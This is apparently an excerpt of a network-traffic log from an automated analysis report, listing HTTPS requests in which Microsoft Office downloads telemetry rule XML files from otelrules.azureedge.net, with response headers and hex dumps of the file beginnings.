                                                                                                                                                                                                            2024-11-22 03:27:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            133192.168.2.44996513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:50 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                            x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032750Z-178bfbc474bwh9gmhC1NYCy3rs00000002kg000000001777
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            134192.168.2.44996413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:50 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                            x-ms-request-id: fdb50a35-301e-005d-1e2f-3ce448000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032751Z-178bfbc474b9fdhphC1NYCac0n000000028000000000k0td
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            135192.168.2.44996713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                            x-ms-request-id: 95a88f05-701e-001e-7f87-3bf5e6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032751Z-15b8b599d88cn5thhC1TEBqxkn00000000rg00000000b3v4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            136192.168.2.44996613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                            x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032751Z-174c587ffdf6b487hC1TEBydsn00000000ug000000007k2f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:51 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            137192.168.2.44996913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:52 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                            x-ms-request-id: ce856bd5-501e-007b-6157-3c5ba2000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032753Z-15b8b599d885v8r9hC1TEB104g00000000w000000000crmg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            138192.168.2.44997013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:52 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                            x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032753Z-178bfbc474b9xljthC1NYCtw94000000028000000000hn6u
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            139192.168.2.44997113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                            x-ms-request-id: f92a0347-601e-005c-7f58-3cf06f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032753Z-15b8b599d882l6clhC1TEBxd5c00000000pg00000000g637
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            140192.168.2.44997213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                            x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032754Z-178bfbc474bgvl54hC1NYCsfuw00000002b000000000ffge
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:54 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            141192.168.2.44997313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:53 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                            x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032754Z-15b8b599d885v8r9hC1TEB104g00000000x000000000af7p
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:54 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
